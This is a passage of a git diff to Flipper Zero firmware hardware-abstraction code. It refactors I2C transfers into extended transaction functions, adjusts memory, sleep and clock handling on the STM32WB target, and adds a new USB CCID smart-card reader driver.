if(LL_I2C_IsActiveFlag_TXIS(handle->bus->i2c)) { - if(size == len + 1) { - LL_I2C_TransmitData8(handle->bus->i2c, mem_addr); - } else { - LL_I2C_TransmitData8(handle->bus->i2c, (*data)); - data++; - } - size--; - } - - if(furi_hal_cortex_timer_is_expired(timer)) { - ret = false; - break; - } - } - - LL_I2C_ClearFlag_STOP(handle->bus->i2c); - } while(0); - - return ret; + return furi_hal_i2c_tx_ext( + handle, + i2c_addr, + false, + &mem_addr, + 1, + FuriHalI2cBeginStart, + FuriHalI2cEndPause, + timeout) && + furi_hal_i2c_tx_ext( + handle, + i2c_addr, + false, + data, + len, + FuriHalI2cBeginResume, + FuriHalI2cEndStop, + timeout); } diff --git a/firmware/targets/f7/furi_hal/furi_hal_memory.c b/firmware/targets/f7/furi_hal/furi_hal_memory.c index 7f69b90ca..3f8df1f44 100644 --- a/firmware/targets/f7/furi_hal/furi_hal_memory.c +++ b/firmware/targets/f7/furi_hal/furi_hal_memory.c @@ -4,9 +4,6 @@ #define TAG "FuriHalMemory" -// STM(TM) Copro(TM) bug(TM) workaround size -#define RAM2B_COPRO_GAP_SIZE_KB 2 - typedef enum { SRAM_A, SRAM_B, @@ -38,13 +35,20 @@ void furi_hal_memory_init() { uint32_t sbrsa = (FLASH->SRRVR & FLASH_SRRVR_SBRSA_Msk) >> FLASH_SRRVR_SBRSA_Pos; uint32_t snbrsa = (FLASH->SRRVR & FLASH_SRRVR_SNBRSA_Msk) >> FLASH_SRRVR_SNBRSA_Pos; + // STM(TM) Copro(TM) bug(TM): SNBRSA is incorrect if stack version is higher than 1.13 and lower than 1.17.2+ + // Radio core started, but not yet ready, so we'll try to guess + // This will be true only if BLE light radio stack used, + // 0x0D is known to be incorrect, 0x0B is known to be correct since 1.17.2+ + // Lower value by 2 pages to match real memory layout + if(snbrsa > 0x0B) { + FURI_LOG_E(TAG, "SNBRSA workaround"); + snbrsa -= 2; + } + uint32_t sram2a_busy_size = (uint32_t)&__sram2a_free__ - (uint32_t)&__sram2a_start__; uint32_t sram2a_unprotected_size = (sbrsa)*1024; uint32_t sram2b_unprotected_size = (snbrsa)*1024; - // STM(TM) Copro(TM) bug(TM) workaround - sram2b_unprotected_size -= 1024 * RAM2B_COPRO_GAP_SIZE_KB; - memory->region[SRAM_A].start = (uint8_t*)&__sram2a_free__; memory->region[SRAM_B].start = (uint8_t*)&__sram2b_start__; diff --git a/firmware/targets/f7/furi_hal/furi_hal_os.c b/firmware/targets/f7/furi_hal/furi_hal_os.c index 3fc1fbea8..046cf79dc 100644 --- a/firmware/targets/f7/furi_hal/furi_hal_os.c +++ b/firmware/targets/f7/furi_hal/furi_hal_os.c @@ -170,27 +170,35 @@ void vPortSuppressTicksAndSleep(TickType_t expected_idle_ticks) { return; } + // Core2 shenanigans takes extra time, so we want to compensate tick skew by reducing sleep duration by 1 tick + TickType_t unexpected_idle_ticks = expected_idle_ticks - 1; + // Limit amount of ticks to maximum that timer can count - if(expected_idle_ticks > FURI_HAL_OS_MAX_SLEEP) { - expected_idle_ticks = FURI_HAL_OS_MAX_SLEEP; + if(unexpected_idle_ticks > FURI_HAL_OS_MAX_SLEEP) { + unexpected_idle_ticks = FURI_HAL_OS_MAX_SLEEP; } // Stop IRQ handling, no one should disturb us till we finish __disable_irq(); + do { + // Confirm OS that sleep is still possible + if(eTaskConfirmSleepModeStatus() == eAbortSleep || furi_hal_os_is_pending_irq()) { + break; + } - // Confirm OS that sleep is still possible - if(eTaskConfirmSleepModeStatus() == eAbortSleep || furi_hal_os_is_pending_irq()) { - __enable_irq(); - return; - } - - // Sleep and track how much ticks we spent sleeping - uint32_t completed_ticks = furi_hal_os_sleep(expected_idle_ticks); - // Notify system about time spent in sleep - if(completed_ticks > 0) { - vTaskStepTick(MIN(completed_ticks, expected_idle_ticks)); - } - + // Sleep and track how much ticks we spent sleeping + uint32_t completed_ticks = furi_hal_os_sleep(unexpected_idle_ticks); + // Notify system about time spent in sleep + if(completed_ticks > 0) { + if(completed_ticks > expected_idle_ticks) { +#ifdef FURI_HAL_OS_DEBUG + furi_hal_console_printf(">%lu\r\n", completed_ticks - expected_idle_ticks); +#endif + completed_ticks = expected_idle_ticks; + } + vTaskStepTick(completed_ticks); + } + } while(0); // Reenable IRQ __enable_irq(); } diff --git a/firmware/targets/f7/furi_hal/furi_hal_power.c b/firmware/targets/f7/furi_hal/furi_hal_power.c index 035919d78..c14de8569 100644 --- a/firmware/targets/f7/furi_hal/furi_hal_power.c +++ b/firmware/targets/f7/furi_hal/furi_hal_power.c @@ -13,7 +13,7 @@ #include #include -#include +#include #include #include #include @@ -162,6 +162,11 @@ static inline void furi_hal_power_resume_aux_periphs() { static inline void furi_hal_power_deep_sleep() { furi_hal_power_suspend_aux_periphs(); + if(!furi_hal_clock_switch_pll2hse()) { + // Hello core2 my old friend + return; + } + while(LL_HSEM_1StepLock(HSEM, CFG_HW_RCC_SEMID)) ; @@ -171,13 +176,13 @@ static inline void furi_hal_power_deep_sleep() { LL_HSEM_ReleaseLock(HSEM, CFG_HW_ENTRY_STOP_MODE_SEMID, 0); // The switch on HSI before entering Stop Mode is required - furi_hal_clock_switch_to_hsi(); + furi_hal_clock_switch_hse2hsi(); } } else { /** * The switch on HSI before entering Stop Mode is required */ - furi_hal_clock_switch_to_hsi(); + furi_hal_clock_switch_hse2hsi(); } /* Release RCC semaphore */ @@ -201,12 +206,14 @@ static inline void furi_hal_power_deep_sleep() { while(LL_HSEM_1StepLock(HSEM, CFG_HW_RCC_SEMID)) ; - if(LL_RCC_GetSysClkSource() != LL_RCC_SYS_CLKSOURCE_STATUS_PLL) { - furi_hal_clock_switch_to_pll(); + if(LL_RCC_GetSysClkSource() != LL_RCC_SYS_CLKSOURCE_STATUS_HSE) { + furi_hal_clock_switch_hsi2hse(); } LL_HSEM_ReleaseLock(HSEM, CFG_HW_RCC_SEMID, 0); + furi_check(furi_hal_clock_switch_hse2pll()); + furi_hal_power_resume_aux_periphs(); furi_hal_rtc_sync_shadow(); } diff --git a/firmware/targets/f7/furi_hal/furi_hal_random.c b/firmware/targets/f7/furi_hal/furi_hal_random.c index cf4b552f6..225519303 100644 --- a/firmware/targets/f7/furi_hal/furi_hal_random.c +++ b/firmware/targets/f7/furi_hal/furi_hal_random.c @@ -6,7 +6,7 @@ #include #include -#include +#include #define TAG "FuriHalRandom" diff --git a/firmware/targets/f7/furi_hal/furi_hal_spi.c b/firmware/targets/f7/furi_hal/furi_hal_spi.c index 17769832b..a8884105a 100644 --- a/firmware/targets/f7/furi_hal/furi_hal_spi.c +++ b/firmware/targets/f7/furi_hal/furi_hal_spi.c @@ -283,7 +283,7 @@ bool furi_hal_spi_bus_trx_dma( if(tx_buffer == NULL) { // RX mode, use dummy data instead of TX buffer tx_buffer = (uint8_t*)&dma_dummy_u32; - tx_mem_increase_mode = LL_DMA_PERIPH_NOINCREMENT; + tx_mem_increase_mode = LL_DMA_MEMORY_NOINCREMENT; } else { tx_mem_increase_mode = LL_DMA_MEMORY_INCREMENT; } @@ -373,4 +373,4 @@ bool furi_hal_spi_bus_trx_dma( furi_check(furi_semaphore_release(spi_dma_lock) == FuriStatusOk); return ret; -} \ No newline at end of file +} diff --git a/firmware/targets/f7/furi_hal/furi_hal_usb_ccid.c b/firmware/targets/f7/furi_hal/furi_hal_usb_ccid.c new file mode 100644 index 000000000..559713d01 --- /dev/null +++ b/firmware/targets/f7/furi_hal/furi_hal_usb_ccid.c @@ -0,0 +1,498 @@ +#include +#include +#include +#include +#include + +#include "usb.h" +#include "usb_ccid.h" + +static const uint8_t USB_DEVICE_NO_CLASS = 0x0; +static const uint8_t USB_DEVICE_NO_SUBCLASS = 0x0; +static const uint8_t USB_DEVICE_NO_PROTOCOL = 0x0; + +#define FIXED_CONTROL_ENDPOINT_SIZE 8 +#define IF_NUM_MAX 1 + +#define CCID_VID_DEFAULT 0x1234 +#define CCID_PID_DEFAULT 0xABCD +#define CCID_TOTAL_SLOTS 1 +#define CCID_SLOT_INDEX 0 + +#define CCID_DATABLOCK_SIZE 256 + +#define ENDPOINT_DIR_IN 0x80 +#define ENDPOINT_DIR_OUT 0x00 + +#define INTERFACE_ID_CCID 0 + +#define CCID_IN_EPADDR (ENDPOINT_DIR_IN | 2) + +/** Endpoint address of the CCID data OUT endpoint, for host-to-device data transfers. */ +#define CCID_OUT_EPADDR (ENDPOINT_DIR_OUT | 1) + +/** Endpoint size in bytes of the CCID data being sent between IN and OUT endpoints. */ +#define CCID_EPSIZE 64 + +struct CcidIntfDescriptor { + struct usb_interface_descriptor ccid; + struct usb_ccid_descriptor ccid_desc; + struct usb_endpoint_descriptor ccid_bulk_in; + struct usb_endpoint_descriptor ccid_bulk_out; +} __attribute__((packed)); + +struct CcidConfigDescriptor { + struct usb_config_descriptor config; + struct CcidIntfDescriptor intf_0; +} __attribute__((packed)); + +enum CCID_Features_Auto_t { + CCID_Features_Auto_None = 0x0, + CCID_Features_Auto_ParameterConfiguration = 0x2, + CCID_Features_Auto_ICCActivation = 0x4, + CCID_Features_Auto_VoltageSelection = 0x8, + + CCID_Features_Auto_ICCClockFrequencyChange = 0x10, + CCID_Features_Auto_ICCBaudRateChange = 0x20, + CCID_Features_Auto_ParameterNegotiation = 0x40, + CCID_Features_Auto_PPS = 0x80, +}; + +enum CCID_Features_ExchangeLevel_t { + CCID_Features_ExchangeLevel_TPDU = 0x00010000, + CCID_Features_ExchangeLevel_ShortAPDU = 0x00020000, + CCID_Features_ExchangeLevel_ShortExtendedAPDU = 0x00040000 +}; + +/* Device descriptor */ +static struct usb_device_descriptor ccid_device_desc = { + .bLength = sizeof(struct usb_device_descriptor), + .bDescriptorType = USB_DTYPE_DEVICE, + .bcdUSB = VERSION_BCD(2, 0, 0), + .bDeviceClass = USB_DEVICE_NO_CLASS, + .bDeviceSubClass = USB_DEVICE_NO_SUBCLASS, + .bDeviceProtocol = USB_DEVICE_NO_PROTOCOL, + .bMaxPacketSize0 = FIXED_CONTROL_ENDPOINT_SIZE, + .idVendor = CCID_VID_DEFAULT, + .idProduct = CCID_PID_DEFAULT, + .bcdDevice = VERSION_BCD(1, 0, 0), + .iManufacturer = UsbDevManuf, + .iProduct = UsbDevProduct, + .iSerialNumber = UsbDevSerial, + .bNumConfigurations = 1, +}; + +/* Device configuration descriptor*/ +static const struct CcidConfigDescriptor ccid_cfg_desc = { + .config = + { + .bLength = sizeof(struct usb_config_descriptor), + .bDescriptorType = USB_DTYPE_CONFIGURATION, + .wTotalLength = sizeof(struct CcidConfigDescriptor), + .bNumInterfaces = 1, + + .bConfigurationValue = 1, + .iConfiguration = NO_DESCRIPTOR, + .bmAttributes = USB_CFG_ATTR_RESERVED | USB_CFG_ATTR_SELFPOWERED, + .bMaxPower = USB_CFG_POWER_MA(100), + }, + .intf_0 = + { + .ccid = + {.bLength = sizeof(struct usb_interface_descriptor), + .bDescriptorType = USB_DTYPE_INTERFACE, + + .bInterfaceNumber = INTERFACE_ID_CCID, + .bAlternateSetting = 0x00, + .bNumEndpoints = 2, + + .bInterfaceClass = USB_CLASS_CCID, + .bInterfaceSubClass = 0, + .bInterfaceProtocol = 0, + + .iInterface = NO_DESCRIPTOR + + }, + .ccid_desc = + {.bLength = sizeof(struct usb_ccid_descriptor), + .bDescriptorType = USB_DTYPE_CCID_FUNCTIONAL, + .bcdCCID = CCID_CURRENT_SPEC_RELEASE_NUMBER, + .bMaxSlotIndex = 0x00, + .bVoltageSupport = CCID_VOLTAGESUPPORT_5V, + .dwProtocols = 0x01, //T0 + .dwDefaultClock = 16000, //16MHz + .dwMaximumClock = 16000, //16MHz + .bNumClockSupported = 0, + .dwDataRate = 307200, + .dwMaxDataRate = 307200, + .bNumDataRatesSupported = 0, + .dwMaxIFSD = 2038, + .dwSynchProtocols = 0, + .dwMechanical = 0, + .dwFeatures = CCID_Features_ExchangeLevel_ShortAPDU | + CCID_Features_Auto_ParameterConfiguration | + CCID_Features_Auto_ICCActivation | + CCID_Features_Auto_VoltageSelection, + .dwMaxCCIDMessageLength = 0x0c00, + .bClassGetResponse = 0xff, + .bClassEnvelope = 0xff, + .wLcdLayout = 0, + .bPINSupport = 0, + .bMaxCCIDBusySlots = 1}, + .ccid_bulk_in = + {.bLength = sizeof(struct usb_endpoint_descriptor), + .bDescriptorType = USB_DTYPE_ENDPOINT, + .bEndpointAddress = CCID_IN_EPADDR, + .bmAttributes = USB_EPTYPE_BULK, + .wMaxPacketSize = CCID_EPSIZE, + .bInterval = 0x05 + + }, + .ccid_bulk_out = + {.bLength = sizeof(struct usb_endpoint_descriptor), + .bDescriptorType = USB_DTYPE_ENDPOINT, + .bEndpointAddress = CCID_OUT_EPADDR, + .bmAttributes = USB_EPTYPE_BULK, + .wMaxPacketSize = CCID_EPSIZE, + .bInterval = 0x05}, + }, +}; + +static void ccid_init(usbd_device* dev, FuriHalUsbInterface* intf, void* ctx); +static void ccid_deinit(usbd_device* dev); +static void ccid_on_wakeup(usbd_device* dev); +static void ccid_on_suspend(usbd_device* dev); + +FuriHalUsbInterface usb_ccid = { + .init = ccid_init, + .deinit = ccid_deinit, + .wakeup = ccid_on_wakeup, + .suspend = ccid_on_suspend, + + .dev_descr = (struct usb_device_descriptor*)&ccid_device_desc, + + .str_manuf_descr = NULL, + .str_prod_descr = NULL, + .str_serial_descr = NULL, + + .cfg_descr = (void*)&ccid_cfg_desc, +}; + +static usbd_respond ccid_ep_config(usbd_device* dev, uint8_t cfg); +static usbd_respond ccid_control(usbd_device* dev, usbd_ctlreq* req, usbd_rqc_callback* callback); +static usbd_device* usb_dev; +static bool connected = false; +static bool smartcard_inserted = true; +static CcidCallbacks* callbacks[CCID_TOTAL_SLOTS] = {NULL}; + +static void* ccid_set_string_descr(char* str) { + furi_assert(str); + + size_t len = strlen(str); + struct usb_string_descriptor* dev_str_desc = malloc(len * 2 + 2); + dev_str_desc->bLength = len * 2 + 2; + dev_str_desc->bDescriptorType = USB_DTYPE_STRING; + for(size_t i = 0; i < len; i++) dev_str_desc->wString[i] = str[i]; + + return dev_str_desc; +} + +static void ccid_init(usbd_device* dev, FuriHalUsbInterface* intf, void* ctx) { + UNUSED(intf); + + FuriHalUsbCcidConfig* cfg = (FuriHalUsbCcidConfig*)ctx; + + usb_dev = dev; + + usb_ccid.dev_descr->iManufacturer = 0; + usb_ccid.dev_descr->iProduct = 0; + usb_ccid.str_manuf_descr = NULL; + usb_ccid.str_prod_descr = NULL; + usb_ccid.dev_descr->idVendor = CCID_VID_DEFAULT; + usb_ccid.dev_descr->idProduct = CCID_PID_DEFAULT; + + if(cfg != NULL) { + usb_ccid.dev_descr->idVendor = cfg->vid; + usb_ccid.dev_descr->idProduct = cfg->pid; + + if(cfg->manuf[0] != '\0') { + usb_ccid.str_manuf_descr = ccid_set_string_descr(cfg->manuf); + usb_ccid.dev_descr->iManufacturer = UsbDevManuf; + } + + if(cfg->product[0] != '\0') { + usb_ccid.str_prod_descr = ccid_set_string_descr(cfg->product); + usb_ccid.dev_descr->iProduct = UsbDevProduct; + } + } + + usbd_reg_config(dev, ccid_ep_config); + usbd_reg_control(dev, ccid_control); + + usbd_connect(dev, true); +} + +static void ccid_deinit(usbd_device* dev) { + usbd_reg_config(dev, NULL); + usbd_reg_control(dev, NULL); + + free(usb_ccid.str_prod_descr); + free(usb_ccid.str_serial_descr); +} + +static void ccid_on_wakeup(usbd_device* dev) { + UNUSED(dev); + connected = true; +} + +static void ccid_on_suspend(usbd_device* dev) { + UNUSED(dev); + connected = false; +} + +struct ccid_bulk_message_header { + uint8_t bMessageType; + uint32_t dwLength; + uint8_t bSlot; + uint8_t bSeq; +} __attribute__((packed)); + +static struct rdr_to_pc_slot_status responseSlotStatus; +static struct rdr_to_pc_data_block responseDataBlock; +static struct rdr_to_pc_parameters_t0 responseParameters; +uint8_t SendDataBlock[CCID_DATABLOCK_SIZE]; + +uint8_t CALLBACK_CCID_GetSlotStatus(uint8_t slot, uint8_t* error) { + if(slot == CCID_SLOT_INDEX) { + *error = CCID_ERROR_NOERROR; + if(smartcard_inserted) { + return CCID_COMMANDSTATUS_PROCESSEDWITHOUTERROR | CCID_ICCSTATUS_PRESENTANDACTIVE; + } else { + return CCID_COMMANDSTATUS_PROCESSEDWITHOUTERROR | CCID_ICCSTATUS_NOICCPRESENT; + } + } else { + *error = CCID_ERROR_SLOTNOTFOUND; + return CCID_COMMANDSTATUS_FAILED | CCID_ICCSTATUS_NOICCPRESENT; + } +} + +uint8_t + CALLBACK_CCID_IccPowerOn(uint8_t slot, uint8_t* atrBuffer, uint32_t* atrlen, uint8_t* error) { + if(slot == CCID_SLOT_INDEX) { + *error = CCID_ERROR_NOERROR; + if(smartcard_inserted) { + if(callbacks[CCID_SLOT_INDEX] != NULL) { + callbacks[CCID_SLOT_INDEX]->icc_power_on_callback(atrBuffer, atrlen, NULL); + } else { + return CCID_COMMANDSTATUS_PROCESSEDWITHOUTERROR | + CCID_ICCSTATUS_PRESENTANDINACTIVE; + } + + return CCID_COMMANDSTATUS_PROCESSEDWITHOUTERROR | CCID_ICCSTATUS_PRESENTANDACTIVE; + } else { + return CCID_COMMANDSTATUS_PROCESSEDWITHOUTERROR | CCID_ICCSTATUS_NOICCPRESENT; + } + } else { + *error = CCID_ERROR_SLOTNOTFOUND; + return CCID_COMMANDSTATUS_FAILED | CCID_ICCSTATUS_NOICCPRESENT; + } +} + +uint8_t CALLBACK_CCID_XfrBlock( + uint8_t slot, + uint8_t* dataBlock, + uint32_t* dataBlockLen, + uint8_t* error) { + if(slot == CCID_SLOT_INDEX) { + *error = CCID_ERROR_NOERROR; + if(smartcard_inserted) { + if(callbacks[CCID_SLOT_INDEX] != NULL) { + callbacks[CCID_SLOT_INDEX]->xfr_datablock_callback(dataBlock, dataBlockLen, NULL); + } else { + return CCID_COMMANDSTATUS_PROCESSEDWITHOUTERROR | + CCID_ICCSTATUS_PRESENTANDINACTIVE; + } + + return CCID_COMMANDSTATUS_PROCESSEDWITHOUTERROR | CCID_ICCSTATUS_PRESENTANDACTIVE; + } else { + return CCID_COMMANDSTATUS_PROCESSEDWITHOUTERROR | CCID_ICCSTATUS_NOICCPRESENT; + } + } else { + *error = CCID_ERROR_SLOTNOTFOUND; + return CCID_COMMANDSTATUS_FAILED | CCID_ICCSTATUS_NOICCPRESENT; + } +} + +void furi_hal_ccid_ccid_insert_smartcard() { + smartcard_inserted = true; +} + +void furi_hal_ccid_ccid_remove_smartcard() { + smartcard_inserted = false; +} + +void furi_hal_ccid_set_callbacks(CcidCallbacks* cb) { + callbacks[CCID_SLOT_INDEX] = cb; +} + +static void ccid_rx_ep_callback(usbd_device* dev, uint8_t event, uint8_t ep) { + UNUSED(dev); + UNUSED(event); + UNUSED(ep); +} + +static void ccid_tx_ep_callback(usbd_device* dev, uint8_t event, uint8_t ep) { + UNUSED(dev); + + if(event == usbd_evt_eprx) { + if(connected == false) return; + + struct ccid_bulk_message_header message; + usbd_ep_read(usb_dev, ep, &message, sizeof(message)); + + uint8_t Status; + uint8_t Error = CCID_ERROR_NOERROR; + + uint32_t dataBlockLen = 0; + uint8_t* dataBlockBuffer = NULL; + + if(message.bMessageType == PC_TO_RDR_GETSLOTSTATUS) { + responseSlotStatus.bMessageType = RDR_TO_PC_SLOTSTATUS; + responseSlotStatus.dwLength = 0; + responseSlotStatus.bSlot = message.bSlot; + responseSlotStatus.bSeq = message.bSeq; + + responseSlotStatus.bClockStatus = 0; + + Status = CALLBACK_CCID_GetSlotStatus(message.bSlot, &Error); + + responseSlotStatus.bStatus = Status; + responseSlotStatus.bError = Error; + + usbd_ep_write( + usb_dev, CCID_IN_EPADDR, &responseSlotStatus, sizeof(responseSlotStatus)); + } else if(message.bMessageType == PC_TO_RDR_ICCPOWERON) { + responseDataBlock.bMessageType = RDR_TO_PC_DATABLOCK; + responseDataBlock.bSlot = message.bSlot; + responseDataBlock.bSeq = message.bSeq; + responseDataBlock.bChainParameter = 0; + + dataBlockLen = 0; + dataBlockBuffer = (uint8_t*)SendDataBlock; + Status = CALLBACK_CCID_IccPowerOn( + message.bSlot, (uint8_t*)dataBlockBuffer, &dataBlockLen, &Error); + + furi_assert(dataBlockLen < CCID_DATABLOCK_SIZE); + responseDataBlock.dwLength = dataBlockLen; + + responseSlotStatus.bStatus = Status; + responseSlotStatus.bError = Error; + + memcpy(responseDataBlock.abData, SendDataBlock, dataBlockLen); + usbd_ep_write( + usb_dev, + CCID_IN_EPADDR, + &responseDataBlock, + sizeof(struct rdr_to_pc_data_block) + (sizeof(uint8_t) * dataBlockLen)); + } else if(message.bMessageType == PC_TO_RDR_ICCPOWEROFF) { + responseSlotStatus.bMessageType = RDR_TO_PC_SLOTSTATUS; + responseSlotStatus.dwLength = 0; + responseSlotStatus.bSlot = message.bSlot; + responseSlotStatus.bSeq = message.bSeq; + + responseSlotStatus.bClockStatus = 0; + + uint8_t Status; + uint8_t Error = CCID_ERROR_NOERROR; + Status = CALLBACK_CCID_GetSlotStatus(message.bSlot, &Error); + + responseSlotStatus.bStatus = Status; + responseSlotStatus.bError = Error; + + usbd_ep_write( + usb_dev, CCID_IN_EPADDR, &responseSlotStatus, sizeof(responseSlotStatus)); + } else if(message.bMessageType == PC_TO_RDR_SETPARAMETERS) { + responseParameters.bMessageType = RDR_TO_PC_PARAMETERS; + responseParameters.bSlot = message.bSlot; + responseParameters.bSeq = message.bSeq; + responseParameters.bProtocolNum = 0; //T0 + + uint8_t Status = CCID_COMMANDSTATUS_PROCESSEDWITHOUTERROR; + uint8_t Error = CCID_ERROR_NOERROR; + + responseParameters.bStatus = Status; + responseParameters.bError = Error; + + responseParameters.dwLength = sizeof(struct rdr_to_pc_parameters_t0); + + usbd_ep_write( + usb_dev, CCID_IN_EPADDR, &responseParameters, sizeof(responseParameters)); + } else if(message.bMessageType == PC_TO_RDR_XFRBLOCK) { + responseDataBlock.bMessageType = RDR_TO_PC_DATABLOCK; + responseDataBlock.bSlot = message.bSlot; + responseDataBlock.bSeq = message.bSeq; + responseDataBlock.bChainParameter = 0; + + dataBlockLen = 0; + dataBlockBuffer = (uint8_t*)SendDataBlock; + Status = CALLBACK_CCID_XfrBlock( + message.bSlot, (uint8_t*)dataBlockBuffer, &dataBlockLen, &Error); + + furi_assert(dataBlockLen < CCID_DATABLOCK_SIZE); + responseDataBlock.dwLength = dataBlockLen; + + responseSlotStatus.bStatus = Status; + responseSlotStatus.bError = Error; + + memcpy(responseDataBlock.abData, SendDataBlock, dataBlockLen); + usbd_ep_write( + usb_dev, + CCID_IN_EPADDR, + &responseDataBlock, + sizeof(struct rdr_to_pc_data_block) + (sizeof(uint8_t) * dataBlockLen)); + } + } +} + +/* Configure endpoints */ +static usbd_respond ccid_ep_config(usbd_device* dev, uint8_t cfg) { + switch(cfg) { + case 0: + /* deconfiguring device */ + usbd_ep_deconfig(dev, CCID_IN_EPADDR); + usbd_ep_deconfig(dev, CCID_OUT_EPADDR); + usbd_reg_endpoint(dev, CCID_IN_EPADDR, 0); + usbd_reg_endpoint(dev, CCID_OUT_EPADDR, 0); + return usbd_ack; + case 1: + /* configuring device */ + usbd_ep_config(dev, CCID_IN_EPADDR, USB_EPTYPE_BULK, CCID_EPSIZE); + usbd_ep_config(dev, CCID_OUT_EPADDR, USB_EPTYPE_BULK, CCID_EPSIZE); + usbd_reg_endpoint(dev, CCID_IN_EPADDR, ccid_rx_ep_callback); + usbd_reg_endpoint(dev, CCID_OUT_EPADDR, ccid_tx_ep_callback); + return usbd_ack; + default: + return usbd_fail; + } +} + +/* Control requests handler */ +static usbd_respond ccid_control(usbd_device* dev, usbd_ctlreq* req, usbd_rqc_callback* callback) { + UNUSED(callback); + /* CDC control requests */ + if(((USB_REQ_RECIPIENT | USB_REQ_TYPE) & req->bmRequestType) == + (USB_REQ_INTERFACE | USB_REQ_CLASS) && + (req->wIndex == 0 || req->wIndex == 2)) { + switch(req->bRequest) { + case CCID_ABORT: + return usbd_fail; + case CCID_GET_CLOCK_FREQUENCIES: + dev->status.data_ptr = (void*)&(ccid_cfg_desc.intf_0.ccid_desc.dwDefaultClock); + dev->status.data_count = sizeof(ccid_cfg_desc.intf_0.ccid_desc.dwDefaultClock); + return usbd_ack; + default: + return usbd_fail; + } + } + return usbd_fail; +} \ No newline at end of file diff --git a/firmware/targets/furi_hal_include/furi_hal.h b/firmware/targets/furi_hal_include/furi_hal.h index 285dbea76..baa9cb91b 100644 --- a/firmware/targets/furi_hal_include/furi_hal.h +++ b/firmware/targets/furi_hal_include/furi_hal.h @@ -35,6 +35,7 @@ struct STOP_EXTERNING_ME {}; #include #include #include +#include #include #include #include diff --git a/firmware/targets/furi_hal_include/furi_hal_bt.h b/firmware/targets/furi_hal_include/furi_hal_bt.h index b7d4eae1a..25a20c4c3 100644 --- a/firmware/targets/furi_hal_include/furi_hal_bt.h +++ b/firmware/targets/furi_hal_include/furi_hal_bt.h @@ -8,7 +8,7 @@ #include #include #include -#include +#include #include #include diff --git a/firmware/targets/furi_hal_include/furi_hal_bt_serial.h b/firmware/targets/furi_hal_include/furi_hal_bt_serial.h index 1b6e79ab0..0472d31d1 100644 --- a/firmware/targets/furi_hal_include/furi_hal_bt_serial.h +++ b/firmware/targets/furi_hal_include/furi_hal_bt_serial.h @@ -1,6 +1,6 @@ #pragma once -#include "serial_service.h" +#include #ifdef __cplusplus extern "C" { diff --git a/firmware/targets/furi_hal_include/furi_hal_i2c.h b/firmware/targets/furi_hal_include/furi_hal_i2c.h index 566574ab8..f493655b4 100644 --- a/firmware/targets/furi_hal_include/furi_hal_i2c.h +++ b/firmware/targets/furi_hal_include/furi_hal_i2c.h @@ -1,11 +1,11 @@ /** - * @file furi_hal_i2c.h - * I2C HAL API + * @file furi_hal_i2c.h I2C HAL API */ #pragma once #include +#include #include #include @@ -13,6 +13,35 @@ extern "C" { #endif +/** Transaction beginning signal */ +typedef enum { + /*!Begin the transaction by sending a START condition followed by the + * address */ + FuriHalI2cBeginStart, + /*!Begin the transaction by sending a RESTART condition followed by the + * address + * @note Must follow a transaction ended with + * FuriHalI2cEndAwaitRestart */ + FuriHalI2cBeginRestart, + /*!Continue the previous transaction with new data + * @note Must follow a transaction ended with FuriHalI2cEndPause and + * be of the same type (RX/TX) */ + FuriHalI2cBeginResume, +} FuriHalI2cBegin; + +/** Transaction end signal */ +typedef enum { + /*!End the transaction by sending a STOP condition */ + FuriHalI2cEndStop, + /*!End the transaction by clock stretching + * @note Must be followed by a transaction using + * FuriHalI2cBeginRestart */ + FuriHalI2cEndAwaitRestart, + /*!Pauses the transaction by clock stretching + * @note Must be followed by a transaction using FuriHalI2cBeginResume */ + FuriHalI2cEndPause, +} FuriHalI2cEnd; + /** Early Init I2C */ void furi_hal_i2c_init_early(); @@ -22,78 +51,126 @@ void furi_hal_i2c_deinit_early(); /** Init I2C */ void furi_hal_i2c_init(); -/** Acquire i2c bus handle +/** Acquire I2C bus handle * - * @return Instance of FuriHalI2cBus + * @param handle Pointer to FuriHalI2cBusHandle instance */ void furi_hal_i2c_acquire(FuriHalI2cBusHandle* handle); -/** Release i2c bus handle - * - * @param bus instance of FuriHalI2cBus aquired in `furi_hal_i2c_acquire` +/** Release I2C bus handle + * + * @param handle Pointer to FuriHalI2cBusHandle instance acquired in + * `furi_hal_i2c_acquire` */ void furi_hal_i2c_release(FuriHalI2cBusHandle* handle); -/** Perform I2C tx transfer +/** Perform I2C TX transfer * - * @param handle pointer to FuriHalI2cBusHandle instance + * @param handle Pointer to FuriHalI2cBusHandle instance * @param address I2C slave address - * @param data pointer to data buffer - * @param size size of data buffer - * @param timeout timeout in ticks + * @param data Pointer to data buffer + * @param size Size of data buffer + * @param timeout Timeout in milliseconds * * @return true on successful transfer, false otherwise */ bool furi_hal_i2c_tx( FuriHalI2cBusHandle* handle, - const uint8_t address, + uint8_t address, const uint8_t* data, - const uint8_t size, + size_t size, uint32_t timeout); -/** Perform I2C rx transfer +/** + * Perform I2C TX transfer, with additional settings. * - * @param handle pointer to FuriHalI2cBusHandle instance + * @param handle Pointer to FuriHalI2cBusHandle instance * @param address I2C slave address - * @param data pointer to data buffer - * @param size size of data buffer - * @param timeout timeout in ticks + * @param ten_bit Whether the address is 10 bits wide + * @param data Pointer to data buffer + * @param size Size of data buffer + * @param begin How to begin the transaction + * @param end How to end the transaction + * @param timer Timeout timer + * + * @return true on successful transfer, false otherwise + */ +bool furi_hal_i2c_tx_ext( + FuriHalI2cBusHandle* handle, + uint16_t address, + bool ten_bit, + const uint8_t* data, + size_t size, + FuriHalI2cBegin begin, + FuriHalI2cEnd end, + uint32_t timeout); + +/** Perform I2C RX transfer + * + * @param handle Pointer to FuriHalI2cBusHandle instance + * @param address I2C slave address + * @param data Pointer to data buffer + * @param size Size of data buffer + * @param timeout Timeout in milliseconds * * @return true on successful transfer, false otherwise */ bool furi_hal_i2c_rx( FuriHalI2cBusHandle* handle, - const uint8_t address, + uint8_t address, uint8_t* data, - const uint8_t size, + size_t size, uint32_t timeout); -/** Perform I2C tx and rx transfers +/** Perform I2C RX transfer, with additional settings. * - * @param handle pointer to FuriHalI2cBusHandle instance + * @param handle Pointer to FuriHalI2cBusHandle instance * @param address I2C slave address - * @param tx_data pointer to tx data buffer - * @param tx_size size of tx data buffer - * @param rx_data pointer to rx data buffer - * @param rx_size size of rx data buffer - * @param timeout timeout in ticks + * @param ten_bit Whether the address is 10 bits wide + * @param data Pointer to data buffer + * @param size Size of data buffer + * @param begin How to begin the transaction + * @param end How to end the transaction + * @param timer Timeout timer + * + * @return true on successful transfer, false otherwise + */ +bool furi_hal_i2c_rx_ext( + FuriHalI2cBusHandle* handle, + uint16_t address, + bool ten_bit, + uint8_t* data, + 